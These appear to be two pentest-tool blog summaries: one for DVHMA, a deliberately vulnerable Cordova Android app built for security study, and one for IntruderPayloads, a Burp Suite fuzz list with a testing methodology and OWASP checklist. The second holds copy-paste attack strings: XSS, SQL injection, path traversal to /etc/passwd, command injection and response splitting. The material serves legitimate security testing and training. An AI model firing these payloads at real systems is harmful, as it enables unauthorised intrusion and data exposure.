DVHMA – Damn Vulnerable Hybrid Mobile App (For Android) That Intentionally Contains Vulnerabilities

Damn Vulnerable Hybrid Mobile App (DVHMA) is an hybrid mobile app (for Android) that intentionally contains vulnerabilities. Its purpose is to enable security professionals to test their tools and techniques legally, help developers better understand the common pitfalls in developing hybrid mobile apps securely.Motivation and ScopeThis app is developed to study pitfalls in developing hybrid apps, e.g., using Apache Cordova or SAP Kapsel, securely. Currently, the main focus is to develop a deeper understanding of injection vulnerabilities that exploit the JavaScript to Java bridge.InstallationPrerequisitesWe assume that theAndroid SDK (https://developer.android.com/sdk/index.html) andApache Cordova (https://cordova.apache.org/), version 6.3.0 or later are installed.Moreover, we assume a basic familiarity with the build system of Apache Cordova.Building DVHMASetting Environment Variablesexport ANDROID_HOME=export PATH=$ANDROID_HOME/tools:$PATHexport PATH=$ANDROID_HOME/platform-tools:$PATHCompiling DVHMAcd DVHMA-Featherweightcordova plugin add ../plugins/DVHMA-Storagecordova plugin add ../plugins/DVHMA-WebIntent cordova platform add androidcordova compile androidRunning DVHMA in an Emulatorcordova run android Team MembersThe development of this application started as part of the project ZertApps. ZertApps was a collaborative research project funded by the German Ministry for Research and Education. It is now developed and maintained by the Software Assurance & Security Research Team at The University of Sheffield, UK.The core developers of DVHMA are:Achim D. BruckerMichael HerzbergPublicationsAchim D. Brucker and Michael Herzberg. On the Static Analysis of Hybrid Mobile Apps: A Report on the State of Apache Cordova Nation. In International Symposium on Engineering Secure Software and Systems (ESSoS). Lecture Notes in Computer Science (9639), pages 72-88, Springer-Verlag, 2016. https://www.brucker.ch/bibliography/abstract/brucker.ea-cordova-security-2016 doi: 10.1007/978-3-319-30806-7_5Download DVHMA

Link: http://feedproxy.google.com/~r/PentestTools/~3/blm_ZImRphM/dvhma-damn-vulnerable-hybrid-mobile-app.html

IntruderPayloads – A Collection Of Burpsuite Intruder Payloads, Fuzz Lists And File Uploads

A collection of Burpsuite Intruder payloads and fuzz lists and pentesting methodology. To pull down all 3rd party repos, run install.sh in the same directory of the IntruderPayloads folder.Author: 1N3@CrowdShield https://crowdshield.comPENTEST METHODOLOGY v2.0BASIC PASSIVE AND ACTIVE CHECKS:Burpsuite Spider with intelligent form submissionManual crawl of website through Burpsuite proxy and submitting INJECTX payloads for trackingBurpsuite passive scanBurpsuite engagement tools > Search > Find commentsBurpsuite engagement tools > Find scriptsBurpsuite engagement tools > Find referencesBurpsuite engagement tools > Analyze targetBurpsuite engagement tools > Discover contentBurpsuite Intruder > file/directory brute forceBurpsuite Intruder > HTTP methods, user agents, etc.Enumerate all software technologies, HTTP methods, and potential attack vectorsUnderstand the function of the site, what types of data is stored or valuable and what sorts of functions to attack, etc.ENUMERATION:OPERATING SYSTEMWEB SERVERDATABASE SERVERSPROGRAMMING LANGUAGESPLUGINS/VERSIONSOPEN PORTSUSERNAMESSERVICESWEB SPIDERINGGOOGLE HACKINGVECTORS:INPUT FORMSGET/POST PARAMSURI/REST STRUCTURECOOKIESHEADERSSEARCH STRINGS:Just some helpful regex terms to search for passively using Burpsuite or any other web proxy…fname|phone|id|org_name|name|emailQUICK ATTACK STRINGS:Not a complete list by any means, but when you’re manually testing and walking through sites and need a quick copy/paste, this can come in handy…CompanyFirst Lastusernameusername@mailinator.comPassword123$+1416312384google.comhttps://google.com//google.com.google.comhttps://google.com/.injectx/rfi_vuln.txthttps://google.com/.injectx/rfi_vuln.txt?`whoami`https://google.com/.injectx/rfi_vuln.txt.pnghttps://google.com/.injectx/rfi_vuln.txt.html1218801/01/19794242424242424242INJECTX’>”></INJECTX>(1)javascript:alert(1)//"><img/onload=alert(1)>’ — "></textarea><img/onload=alert(1)>’ — INJECTX’>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>’>"><iframe/onload=alert(1)></iframe>INJECTX’>"><ScRiPt>confirm(1)<ScRiPt>"></textarea><img/onload=alert(1)>’ — // INJECTX <!– "><img/onload=alert(1)>’ — // INJECTX <!– INJECTX’"><h1>X<!– INJECTX"><h1>Xen%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A../../../../../../../../../../../etc/passwdsleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5admin" or "1"="1"– admin’ or ‘1’=’1′– firstlastcompany%0a%0dOWASP TESTING CHECKLIST:Spiders, Robots and Crawlers IG-001Search Engine Discovery/Reconnaissance IG-002Identify application entry points IG-003Testing for Web Application Fingerprint IG-004Application Discovery IG-005Analysis of Error Codes IG-006SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) – SSL Weakness CM‐001DB Listener Testing – DB Listener weak CM‐002Infrastructure Configuration Management Testing – Infrastructure Configuration management weakness CM‐003Application Configuration Management Testing – Application Configuration management weakness CM‐004Testing for File Extensions Handling – File extensions handling CM‐005Old, backup and unreferenced files – Old, backup and unreferenced files CM‐006Infrastructure and Application Admin Interfaces – Access to Admin interfaces CM‐007Testing for HTTP Methods and XST – HTTP Methods enabled, XST permitted, HTTP Verb CM‐008Credentials transport over an encrypted channel – Credentials transport over an encrypted channel AT-001Testing for user enumeration – User enumeration AT-002Testing for Guessable (Dictionary) User Account – Guessable user account AT-003Brute Force Testing – Credentials Brute forcing AT-004Testing for bypassing authentication schema – Bypassing authentication schema AT-005Testing for vulnerable remember password and pwd reset – Vulnerable remember password, weak pwd reset AT-006Testing for Logout and Browser Cache Management – – Logout function not properly implemented, browser cache weakness AT-007Testing for CAPTCHA – Weak Captcha implementation AT-008Testing Multiple Factors Authentication – Weak Multiple Factors Authentication AT-009Testing for Race Conditions – Race Conditions vulnerability AT-010Testing for Session Management Schema – Bypassing Session Management Schema, Weak Session Token SM-001Testing for Cookies attributes – Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002Testing for Session Fixation – Session Fixation SM-003Testing for Exposed Session Variables – Exposed sensitive session variables SM-004Testing for CSRF – CSRF SM-005Testing for Path Traversal – Path Traversal AZ-001Testing for bypassing authorization schema – Bypassing authorization schema AZ-002Testing for Privilege Escalation – Privilege Escalation AZ-003Testing for Business Logic – Bypassable business logic BL-001Testing for Reflected Cross Site Scripting – Reflected XSS DV-001Testing for Stored Cross Site Scripting – Stored XSS DV-002Testing for DOM based Cross Site Scripting – DOM XSS DV-003Testing for Cross Site Flashing – Cross Site Flashing DV-004SQL Injection – SQL Injection DV-005LDAP Injection – LDAP Injection DV-006ORM Injection – ORM Injection DV-007XML Injection – XML Injection DV-008SSI Injection – SSI Injection DV-009XPath Injection – XPath Injection DV-010IMAP/SMTP Injection – IMAP/SMTP Injection DV-011Code Injection – Code Injection DV-012OS Commanding – OS Commanding DV-013Buffer overflow – Buffer overflow DV-014Incubated vulnerability – Incubated vulnerability DV-015Testing for HTTP Splitting/Smuggling – HTTP Splitting, Smuggling DV-016Testing for SQL Wildcard Attacks – SQL Wildcard vulnerability DS-001Locking Customer Accounts – Locking Customer Accounts DS-002Testing for DoS Buffer Overflows – Buffer Overflows DS-003User Specified Object Allocation – User Specified Object Allocation DS-004User Input as a Loop Counter – User Input as a Loop Counter DS-005Writing User Provided Data to Disk – Writing User Provided Data to Disk DS-006Failure to Release Resources – Failure to Release Resources DS-007Storing too Much Data in Session – Storing too Much Data in Session DS-008WS Information Gathering – N.A. WS-001Testing WSDL – WSDL Weakness WS-002XML Structural Testing – Weak XML Structure WS-003XML content-level Testing – XML content-level WS-004HTTP GET parameters/REST Testing – WS HTTP GET parameters/REST WS-005Naughty SOAP attachments – WS Naughty SOAP attachments WS-006Replay Testing – WS Replay Testing WS-007AJAX Vulnerabilities – N.A. AJ-001AJAX Testing – AJAX weakness AJ-002LOW SEVERITY:A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.Descriptive error messages (e.g. Stack Traces, application or server errors).HTTP 404 codes/pages or other HTTP non-200 codes/pages.Banner disclosure on common/public services.Disclosure of known public files or directories, (e.g. robots.txt).Click-Jacking and issues only exploitable through click-jacking.CSRF on forms which are available to anonymous users (e.g. the contact form).Logout Cross-Site Request Forgery (logout CSRF).Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.Lack of Secure and HTTPOnly cookie flags.Lack of Security Speedbump when leaving the site.Weak Captcha / Captcha BypassUsername enumeration via Login Page error messageUsername enumeration via Forgot Password error messageLogin or Forgot Password page brute force and account lockout not enforced.OPTIONS / TRACE HTTP method enabledSSL Attacks such as BEAST, BREACH, Renegotiation attackSSL Forward secrecy not enabledSSL Insecure cipher suitesThe Anti-MIME-Sniffing header X-Content-Type-OptionsMissing HTTP security headersSecurity best practices without accompanying Proof-of-Concept exploitationDescriptive error messages (e.g. Stack Traces, application or server errors).HTTP 404 codes/pages or other HTTP non-200 codes/pages.Denial of Service Attacks.Fingerprinting / banner disclosure on common/public services.Disclosure of known public files or directories, (e.g. robots.txt).Clickjacking and issues only exploitable through clickjacking.CSRF on non-sensitive forms.Logout Cross-Site Request Forgery (logout CSRF).Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.Lack of Secure/HTTPOnly flags on non-sensitive Cookies.Lack of Security Speedbump when leaving the site.Weak Captcha / Captcha BypassLogin or Forgot Password page brute force and account lockout not enforced.OPTIONS HTTP method enabledHTTPS Mixed Content ScriptsKnown vulnerable librariesAttacks on Third Party Ad ServicesUsername / email enumeration via Forgot Password or Login pageMissing HTTP security headersStrict-Transport-Security Not Enabled For HTTPSX-Frame-OptionsX-XSS-ProtectionX-Content-Type-OptionsContent-Security-Policy, X-Content-Security-Policy, X-WebKit-CSPContent-Security-Policy-Report-OnlySSL Issues, e.g.SSL Attacks such as BEAST, BREACH, Renegotiation attackSSL Forward secrecy not enabledSSL weak / insecure cipher suitesLack of SPF records (Email Spoofing)Auto-complete enabled on password fieldsHTTP enabledSession ID or Login Sent Over HTTPInsecure CookiesCross-Domain.xml Allows All DomainsHTML5 Allowed DomainsCross Origin PolicyContent Sniffing Not DisabledPassword Reset Account EnumerationHTML Form Abuse (Denial of Service)Weak HSTS Age (86,000 or less)Lack of Password Security Policy (Brute Forcable Passwords)Physical TestingDenial of service attacksResource Exhaustion attacksIssues related to rate limitingLogin or Forgot Password page brute force and account lockout not enforcedapi*.netflix.com listens on port 80Cross-domain access policy scoped to *.netflix.comUsername / Email Enumerationvia Login Page error messagevia Forgot Password error messagevia RegistrationWeak passwordWeak Captcha / Captcha bypassLack of Secure/HTTPOnly flags on cookiesCookie valid after logoutCookie valid after password resetCookie expirationForgot password autologinAutologin token reuseSame Site ScriptingSSL Issues, e.g.SSL Attacks such as BEAST, BREACH, Renegotiation attackSSL Forward secrecy not enabledSSL weak / insecure cipher suitesSSL vulnerabilities related to configuration or versionDescriptive error messages (e.g. Stack Traces, application or server errors).HTTP 404 codes/pages or other HTTP non-200 codes/pages.Fingerprinting/banner disclosure on common/public services.Disclosure of known public files or directories, (e.g. robots.txt).Clickjacking and issues only exploitable through clickjacking.CSRF on forms that are available to anonymous users (e.g. the contact form).Logout Cross-Site Request Forgery (logout CSRF).Missing CSRF protection on non-sensitive functionalityPresence of application or web browser ‘autocomplete’ or ‘save password’ functionality.Incorrect CharsetHTML AutocompleteOPTIONS HTTP method enabledTRACE HTTP method enabledMissing HTTP security headers, specifically(https://www.owasp.org/index.php/List_of_useful_HTTP_headers), e.g.Strict-Transport-SecurityX-Frame-OptionsX-XSS-ProtectionX-Content-Type-OptionsContent-Security-Policy, X-Content-Security-Policy, X-WebKit-CSPContent-Security-Policy-Report-OnlyIssues only present in old browsers/old plugins/end-of-life software browsersIE < 9Chrome < 40Firefox < 35Safari < 7Opera < 13Vulnerability reports related to the reported version numbers of web servers, services, or frameworksDownload IntruderPayloads

Link: http://feedproxy.google.com/~r/PentestTools/~3/dwr4rfW5XYM/intruderpayloads-collection-of.html